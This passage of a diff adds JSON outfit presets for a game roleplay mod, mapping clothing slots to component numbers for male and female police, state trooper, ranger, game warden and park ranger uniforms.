+"Watch": "0:0", +"Mask": "1:1", +"Top": "196:15", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "74:1" + }, + { +"Name": "Female DPPD Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:15", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "74:1" + }, + { +"Name": "Female DPPD Utility Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:8", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "66:8" + }, + { +"Name": "Female DPPD Utility Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "227:8", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "66:8" + }, + { +"Name": "Female DPPD Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:18", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "49:1" + }, + { +"Name": "Female DPPD Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "141:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "49:1" + }, + { +"Name": "Female DPPD Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "190:10", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "49:1" + }, + { +"Name": "Female DPPD Bicycle Patrol", +"Gender": "Female", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "48:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:18", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "15:3", +"Shoes": "11:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female DPPD SWAT", +"Gender": "Female", +"Category": "EUP", +"Category2": "DPPD", +"Hat": "150:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "39:1", +"Top": "231:11", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "31:2", +"Shoes": "26:1", +"Accessories": "82:1", +"Armor": "28:8", +"Parachute": "49:1" + }, + { +"Name": "Male NYSP Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "14:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:17", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "45:2", +"Pants": "26:5", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "77:1" + }, + { +"Name": "Male NYSP Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "197:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "45:2", +"Pants": "26:5", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "27:6", +"Parachute": "77:1" + }, + { +"Name": "Male NYSP Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:18", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "45:2", +"Pants": "26:5", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "77:1" + }, + { +"Name": "Male NYSP Pullover", +"Gender": "Male", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "45:2", +"Pants": "26:5", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male NYSP Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "9:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "266:6", +"UpperSkin": "45:1", +"Decal": "1:14", +"UnderCoat": "45:2", +"Pants": "26:5", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "65:13" + }, + { +"Name": "Male NYSP Parka", +"Gender": "Male", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "9:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "17:1", +"UpperSkin": "45:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "34:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "27:6", +"Parachute": "49:1" + }, + { +"Name": "Female NYSP Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "14:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:17", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "53:2", +"Pants": "4:14", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "77:1" + }, + { +"Name": "Female NYSP Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "199:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "53:2", +"Pants": "4:14", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "77:1" + }, + { +"Name": "Female NYSP Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:18", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "53:2", +"Pants": "4:14", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "77:1" + }, + { +"Name": "Female NYSP Pullover", +"Gender": "Female", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "53:2", +"Pants": "4:14", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female NYSP Coat", +"Gender": "Female", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "9:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "275:6", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "53:2", +"Pants": "4:14", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "65:13" + }, + { +"Name": "Female NYSP Parka", +"Gender": "Female", +"Category": "EUP", +"Category2": "NYSP", +"Hat": "9:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "45:1", +"UpperSkin": "50:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "33:1", +"Shoes": "54:1", +"Accessories": "1:1", +"Armor": "29:6", +"Parachute": "1:1" + }, + { +"Name": "Male LSDRP Ranger Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:21", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "71:1" + }, + { +"Name": "Male LSDRP Ranger Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:21", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "71:1" + }, + { +"Name": "Male LSDRP Ranger Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:21", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "71:1" + }, + { +"Name": "Male LSDRP Ranger Turtleneck", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "197:11", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "71:1" + }, + { +"Name": "Male LSDRP Ranger Pullover", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSRDP Ranger Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "266:11", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "65:17" + }, + { +"Name": "Female LSDRP Ranger Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:21", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "71:1" + }, + { +"Name": "Female LSDRP Ranger Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:21", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "71:1" + }, + { +"Name": "Female LSDRP Ranger Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:21", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "71:1" + }, + { +"Name": "Female LSDRP Ranger Turtleneck", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "199:11", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "71:1" + }, + { +"Name": "Female LSDRP Ranger Pullover", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:7", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSDRP Ranger Coat", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSDRP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "275:11", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "65:17" + }, + { +"Name": "Male Game Warden Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:19", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "81:1" + }, + { +"Name": "Male Game Warden Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:19", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "81:1" + }, + { +"Name": "Male Game Warden Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:19", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "81:1" + }, + { +"Name": "Male Game Warden Turtleneck", +"Gender": "Male", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "197:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "81:1" + }, + { +"Name": "Male Game Warden Pullover", +"Gender": "Male", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "19:4", +"Parachute": "21:1" + }, + { +"Name": "Male Game Warden Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:12", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "49:1" + }, + { +"Name": "Male Game Warden Utility", +"Gender": "Male", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "136:10", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:13", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "66:14" + }, + { +"Name": "Male Game Warden Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "136:10", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "266:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "65:16" + }, + { +"Name": "Male Game Warden Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "136:10", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:13", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:5", +"Parachute": "81:1" + }, + { +"Name": "Male Game Warden Special Operations", +"Gender": "Male", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "106:2", +"Glasses": "24:9", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "221:15", +"UpperSkin": "140:20", +"Decal": "1:1", +"UnderCoat": "69:1", +"Pants": "38:4", +"Shoes": "36:2", +"Accessories": "111:1", +"Armor": "28:8", +"Parachute": "49:1" + }, + { +"Name": "Female Game Warden Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:19", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "81:1" + }, + { +"Name": "Female Game Warden Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:19", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "81:1" + }, + { +"Name": "Female Game Warden Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:19", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "81:1" + }, + { +"Name": "Female Game Warden Turtleneck", +"Gender": "Female", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "199:8", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "81:1" + }, + { +"Name": "Female Game Warden Pullover", +"Gender": "Female", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:8", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "23:4", +"Parachute": "21:1" + }, + { +"Name": "Female Game Warden Coat", +"Gender": "Female", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "275:7", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "65:16" + }, + { +"Name": "Female Game Warden Utility", +"Gender": "Female", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:13", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "66:14" + }, + { +"Name": "Female Game Warden Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:12", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "49:1" + }, + { +"Name": "Female Game Warden Special Operations", +"Gender": "Female", +"Category": "EUP", +"Category2": "SADFW", +"Hat": "105:2", +"Glasses": "26:9", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:14", +"UpperSkin": "175:20", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "37:4", +"Shoes": "37:2", +"Accessories": "82:1", +"Armor": "30:8", +"Parachute": "49:1" + }, + { +"Name": "Male LE Park Ranger Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:20", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "80:1" + }, + { +"Name": "Male LE Park Ranger Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:20", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "80:1" + }, + { +"Name": "Male LE Park Ranger Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:20", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "80:1" + }, + { +"Name": "Male LE Park Ranger Turtleneck", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "197:9", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "80:1" + }, + { +"Name": "Male LE Park Ranger Pullover", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:2", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "37:1", +"Parachute": "21:1" + }, + { +"Name": "Male LE Park Ranger Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "136:12", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:13", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "49:1" + }, + { +"Name": "Male LE Park Ranger K-9", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "136:12", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:12", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "66:13" + }, + { +"Name": "Male LE Park Ranger Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "266:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "79:1" + }, + { +"Name": "Male LE Park Ranger Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:12", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:5", +"Parachute": "80:1" + }, + { +"Name": "Female LE Park Ranger Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:20", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "80:1" + }, + { +"Name": "Female LE Park Ranger Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:20", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "80:1" + }, + { +"Name": "Female LE Park Ranger Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:20", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "80:1" + }, + { +"Name": "Female LE Park Ranger Turtleneck", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "199:9", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "80:1" + }, + { +"Name": "Female LE Park Ranger Pullover", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:2", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Female LE Ranger Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:13", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "49:1" + }, + { + }, + { +"Name": "Female LE Park Ranger K-9", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:12", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "66:13" + }, + { +"Name": "Female LE Park Ranger Coat", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "275:8", +"UpperSkin": "37:1", +"Decal": "1:1", 